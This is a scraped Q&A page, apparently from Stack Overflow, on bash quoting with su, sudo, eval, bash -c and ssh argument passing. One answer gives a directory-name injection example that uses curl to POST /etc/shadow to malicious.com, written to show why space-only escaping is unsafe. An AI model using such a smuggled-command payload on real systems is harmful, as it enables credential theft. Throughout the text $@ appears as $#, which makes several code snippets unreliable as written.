Emulating sudo's behaviour with su - bash

I'm trying to write a wrapper around su to make it more like sudo, so that su_wrapper foo bar baz == su -c "foo bar baz".
However, I'm not sure how to approach this problem. I came up with this:
su_wrapper ()
{
su -c "$#"
}
However, in the above, only a single argument can be there; this fails with multiple arguments (as su sees them as its own arguments).
There's also another problem: since the argument is passed through the shell, I think I must explicitly specify the shell to avoid other problems. Perhaps what I want to do could be expressed in pseudo-bash(!) as su -c 'bash -c "$#"'.
So, how could I make it accept multiple arguments?

Use printf "%q" to escape the parameters so they can be used as string input to your function:
su_wrapper() {
su -s /bin/bash -c "$(printf "%q " "$#")"
}
Unlike $*, this works even when the parameters contain special characters and whitespace.

You need $* and not $#:
su_wrapper() {
local IFS=' '
su -c "$*"
}
See the Special Parameters section in the Bash Reference Manual for the difference between $* and $#.
I added local IFS=' ' just in case IFS is set to something else (after reading what $* does, it should be clear why you want to make sure that IFS is set to a space).

Related

How to save environment variables to file [duplicate]

Suppose you have the following command stored in a variable:
COMMAND='echo hello'
What's the difference between
$ eval "$COMMAND"
hello
$ bash -c "$COMMAND"
hello
$ $COMMAND
hello
? Why is the last version almost never used if it is shorter and (as far as I can see) does exactly the same thing?
The third form is not at all like the other two -- but to understand why, we need to go into the order of operations when bash in interpreting a command, and look at which of those are followed when each method is in use.
Bash Parsing Stages
Quote Processing
Splitting Into Commands
Special Operator Parsing
Expansions
Word Splitting
Globbing
Execution
Using eval "$string"
eval "$string" follows all the above steps starting from #1. Thus:
Literal quotes within the string become syntactic quotes
Special operators such as >() are processed
Expansions such as $foo are honored
Results of those expansions are split on characters into whitespace into separate words
Those words are expanded as globs if they parse as same and have available matches, and finally the command is executed.
Using sh -c "$string"
...performs the same as eval does, but in a new shell launched as a separate process; thus, changes to variable state, current directory, etc. will expire when this new process exits. (Note, too, that that new shell may be a different interpreter supporting a different language; ie. sh -c "foo" will not support the same syntax that bash, ksh, zsh, etc. do).
Using $string
...starts at step 5, "Word Splitting".
What does this mean?
Quotes are not honored.
printf '%s\n' "two words" will thus parse as printf %s\n "two words", as opposed to the usual/expected behavior of printf %s\n two words (with the quotes being consumed by the shell).
Splitting into multiple commands (on ;s, &s, or similar) does not take place.
Thus:
s='echo foo && echo bar'
$s
...will emit the following output:
foo && echo bar
...instead of the following, which would otherwise be expected:
foo
bar
Special operators and expansions are not honored.
No $(foo), no $foo, no <(foo), etc.
Redirections are not honored.
>foo or 2>&1 is just another word created by string-splitting, rather than a shell directive.
$ bash -c "$COMMAND"
This version starts up a new bash interpreter, runs the command, and then exits, returning control to the original shell. You don't need to be running bash at all in the first place to do this, you can start a bash interpreter from tcsh, for example. You might also do this from a bash script to start with a fresh environment or to keep from polluting your current environment.
EDIT:
As #CharlesDuffy points out starting a new bash shell in this way will clear shell variables but environment variables will be inherited by the spawned shell process.
Using eval causes the shell to parse your command twice. In the example you gave, executing $COMMAND directly or doing an eval are equivalent, but have a look at the answer here to get a more thorough idea of what eval is good (or bad) for.
There are at least times when they are different. Consider the following:
$ cmd="echo \$var"
$ var=hello
$ $cmd
$var
$ eval $cmd
hello
$ bash -c "$cmd"
$ var=world bash -c "$cmd"
world
which shows the different points at which variable expansion is performed. It's even more clear if we do set -x first
$ set -x
$ $cmd
+ echo '$var'
$var
$ eval $cmd
+ eval echo '$var'
++ echo hello
hello
$ bash -c "$cmd"
+ bash -c 'echo $var'
$ var=world bash -c "$cmd"
+ var=world
+ bash -c 'echo $var'
world
We can see here much of what Charles Duffy talks about in his excellent answer. For example, attempting to execute the variable directly prints $var because parameter expansion and those earlier steps had already been done, and so we don't get the value of var, as we do with eval.
The bash -c option only inherits exported variables from the parent shell, and since I didn't export var it's not available to the new shell.

How to run an arbitrary command in bash -c?

I basically want to do bash -c "$#", but that doesn't work (my command does not get run). While eval "$#" works fine, what's the difference?
I want to do something like this:
myscript:
function run_it() {
bash -c "$#"
}
run_it $#
./myscript MY_VAR=5 make my-target
It's because of the quoting. This should work better:
function run_it() {
bash -c "$*" # Change 1
}
run_it "$#" # Change 2
The reason for change 1: $# is special when used inside quotes, like "$#". Rather than expanding to a single argument, it expands to a series of quoted arguments: "MY_VAR=5" "make" "my-target". As a result, the -c flag only receives the MY_VAR=5 part, which is executed with make and my-target as arguments $0 and $1 respectively. By using "$*" you do end up with a single string. Note that this still doesn't handle spaces correctly; not sure how to fix that.
The reason for change 2: Here we do want every argument to be quoted individually. This makes sure that arguments aren't being split too soon. It might be pointless until you fix the other spaces issue first though.

Can't use redirections in a shell command stored in a string [duplicate]

Suppose you have the following command stored in a variable:
COMMAND='echo hello'
What's the difference between
$ eval "$COMMAND"
hello
$ bash -c "$COMMAND"
hello
$ $COMMAND
hello
? Why is the last version almost never used if it is shorter and (as far as I can see) does exactly the same thing?
The third form is not at all like the other two -- but to understand why, we need to go into the order of operations when bash in interpreting a command, and look at which of those are followed when each method is in use.
Bash Parsing Stages
Quote Processing
Splitting Into Commands
Special Operator Parsing
Expansions
Word Splitting
Globbing
Execution
Using eval "$string"
eval "$string" follows all the above steps starting from #1. Thus:
Literal quotes within the string become syntactic quotes
Special operators such as >() are processed
Expansions such as $foo are honored
Results of those expansions are split on characters into whitespace into separate words
Those words are expanded as globs if they parse as same and have available matches, and finally the command is executed.
Using sh -c "$string"
...performs the same as eval does, but in a new shell launched as a separate process; thus, changes to variable state, current directory, etc. will expire when this new process exits. (Note, too, that that new shell may be a different interpreter supporting a different language; ie. sh -c "foo" will not support the same syntax that bash, ksh, zsh, etc. do).
Using $string
...starts at step 5, "Word Splitting".
What does this mean?
Quotes are not honored.
printf '%s\n' "two words" will thus parse as printf %s\n "two words", as opposed to the usual/expected behavior of printf %s\n two words (with the quotes being consumed by the shell).
Splitting into multiple commands (on ;s, &s, or similar) does not take place.
Thus:
s='echo foo && echo bar'
$s
...will emit the following output:
foo && echo bar
...instead of the following, which would otherwise be expected:
foo
bar
Special operators and expansions are not honored.
No $(foo), no $foo, no <(foo), etc.
Redirections are not honored.
>foo or 2>&1 is just another word created by string-splitting, rather than a shell directive.
$ bash -c "$COMMAND"
This version starts up a new bash interpreter, runs the command, and then exits, returning control to the original shell. You don't need to be running bash at all in the first place to do this, you can start a bash interpreter from tcsh, for example. You might also do this from a bash script to start with a fresh environment or to keep from polluting your current environment.
EDIT:
As #CharlesDuffy points out starting a new bash shell in this way will clear shell variables but environment variables will be inherited by the spawned shell process.
Using eval causes the shell to parse your command twice. In the example you gave, executing $COMMAND directly or doing an eval are equivalent, but have a look at the answer here to get a more thorough idea of what eval is good (or bad) for.
There are at least times when they are different. Consider the following:
$ cmd="echo \$var"
$ var=hello
$ $cmd
$var
$ eval $cmd
hello
$ bash -c "$cmd"
$ var=world bash -c "$cmd"
world
which shows the different points at which variable expansion is performed. It's even more clear if we do set -x first
$ set -x
$ $cmd
+ echo '$var'
$var
$ eval $cmd
+ eval echo '$var'
++ echo hello
hello
$ bash -c "$cmd"
+ bash -c 'echo $var'
$ var=world bash -c "$cmd"
+ var=world
+ bash -c 'echo $var'
world
We can see here much of what Charles Duffy talks about in his excellent answer. For example, attempting to execute the variable directly prints $var because parameter expansion and those earlier steps had already been done, and so we don't get the value of var, as we do with eval.
The bash -c option only inherits exported variables from the parent shell, and since I didn't export var it's not available to the new shell.

What does $"${#// /\\ }" mean in bash?

When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"
The "${#// /\\ }" input is a simple shell command (parameter expansion). Why add a $ before this command? What does this $"" mean?
This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, are passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$#" expands to the full list of arguments given to the current script.
"${#//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${#// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.
It thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${#// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
Aside: What's the leading $ in $"${#/...//...}" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while read -r path; do
ssh "$host" "mkdir -p $path"
done < <(find /home/someuser/files -type d -printf '%P\0')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$#"
# on the remote system, run "bash -s", with the script to run fed on stdin
# this guarantees that the remote shell is bash, which printf %q quoted content
# to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$#"
}
cmd_str=$(posix_quote "$#")
ssh "$slave" "$cmd_str"
Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${#// /\\ } will quote this whitespace so that the expansion which takes place next will keep the whitespace as part of the argument for another command.
Anyway, probably an example is in order. Create a tst.sh with above line and make executable.
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"' >> tst.sh
chmod +x tst.sh
try to run a mkdir command on the remote server, aka slave, of a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of whitespace taking place, you'll now have a dir with spaces directory in /tmp on the server owned by uid.
Check using ssh uid#server ls /tmp
And if you're in a different country and really wanted some non-english character, that's maintained by surrounding with the $"...", aka locale-specific.

bash parameter variables in script problem

I have a script I wrote for switching to root or running a command as root without a password. I edited my /etc/sudoers file so that my user [matt] has permission to run /bin/su with no password. This is my script "s" contents:
matt: ~ $ cat ~/bin/s
#!/bin/bash
[ "$1" != "" ] && c='-c'
sudo su $c "$*"
If there are no parameters [simply s], it basically calls sudo su which goes to root with no password. But if I put paramaters, the $c variable equals "-c", which makes su execute a single command.
It works good, except for when I need to use spaces. For example:
matt: ~ $ touch file\ with\ spaces
matt: ~ $ s chown matt file\ with\ spaces
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file with spaces'
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file\ with\ spaces'
matt: ~ $
How can I fix this?
Also, what's the difference between $* and $# ?
Ah, fun with quoting. Usually, the approach #John suggests will work for this: use "$#", and it won't try to interpret (and get confused by) the spaces and other funny characters in your parameters. In this case, however, that won't work because su's -c option expects the entire command to be passed as a single parameter, and then it'll start a new shell which parses the command (including getting confused by spaces and such). In order to avoid this, you actually need to re-quote the parameters within the string you're going to pass to su -c. bash's printf builtin can do this:
#!/bin/bash
if [ $# -gt 0 ]; then
sudo su -c "$(printf "%q " "$#")"
else
sudo su
fi
Let me go over what's happening here:
You run a command like s chown matt file\ with\ spaces
bash parses this into a list of words: "s" "chown" "matt" "file with spaces". Note that at this point the escapes you typed have been removed (although they had their intended effect: making bash treat those spaces as part of a parameter, rather than separators between parameters).
When bash parses the printf "%q " "$#" command in the script, it replaces "$#" with the arguments to the script, with parameter breaks intact. It's equivalent to printf "%q " "chown" "matt" "file with spaces".
printf interprets the format string "%q " to mean "print each remaining parameter in quoted form, with a space after it". It prints: "chown matt file\ with\ spaces ", essentially reconstructing the original command line (it has an extra space on the end, but this turns out not to be a problem).
This is then passed to sudo as a parameter (since there are double-quotes around the $() construct, it'll be treated as a single parameter to sudo). This is equivalent to running sudo su -c "chown matt file\ with\ spaces ".
sudo runs su, and passes along the rest of the parameter list it got including the fully escaped command.
su runs a shell, and it also passes along the rest of its parameter list.
The shell executes the command it got as an argument to -c: chown matt file\ with\ spaces. In the normal course of parsing it, it'll interpret the unescaped spaces as separators between parameters, and the escaped spaces as part of a parameter, and it'll ignore the extra space at the end.
The shell runs chown, with the parameters "matt" and "file with spaces". This does what you expected.
Isn't bash parsing a hoot?
"$*" collects all the positional parameters ($1, $2, …) into a single word, separated by one space (more generally, the first character of $IFS). Note that in shell terminology, a word can include any character including spaces: "foo bar" or foo\ bar parses to a single word. For example, if there are three arguments, then "$*" is equivalent to "$1 $2 $3". If there is no argument, then "$*" is equivalent to "" (an empty word).
"$#" is a special syntax that expands to the list of positional parameters, each in its own word. For example, if there are three arguments, then "$#" is equivalent to "$1" "$2" "$3". If there is no argument, then "$#" is equivalent to nothing (an empty list, not a list with one word that is empty).
"$#" is almost always what you want to use, as opposed to "$*", or unquoted $* or $# (the last two are exactly equivalent and perform filename generation (a.k.a. globbing) and word splitting on all the positional parameters).
There's an additional problem, which is that su except a single shell command as the argument of -c, and you're passing it multiple words. You've had a detailed explanation of getting the quoting right, but let me add advice on how to do it right, which sidesteps the double quoting issues. You may also want to refer to https://unix.stackexchange.com/questions/3063/how-do-i-run-a-command-as-the-system-administrator-root for more background on sudo and su.
sudo already runs a command as root, so there's no need to invoke su. In case your script has no argument , you can just run a shell directly; unless your version of sudo is very old, there's an option for that: sudo -s. So your script can be:
#!/bin/sh
if [ $# -eq 0 ]; then set -- -s; else set -- -- "$#"; fi
exec sudo "$#"
(The else part is to handle the rare case of a command that begins with -.)
I wouldn't bother with such a short script though. Running a command as root is unusual and risky enough that typing the three extra characters shouldn't be a problem. Running a shell as root is even more unusual and risky and surely deserves six more characters.

Resources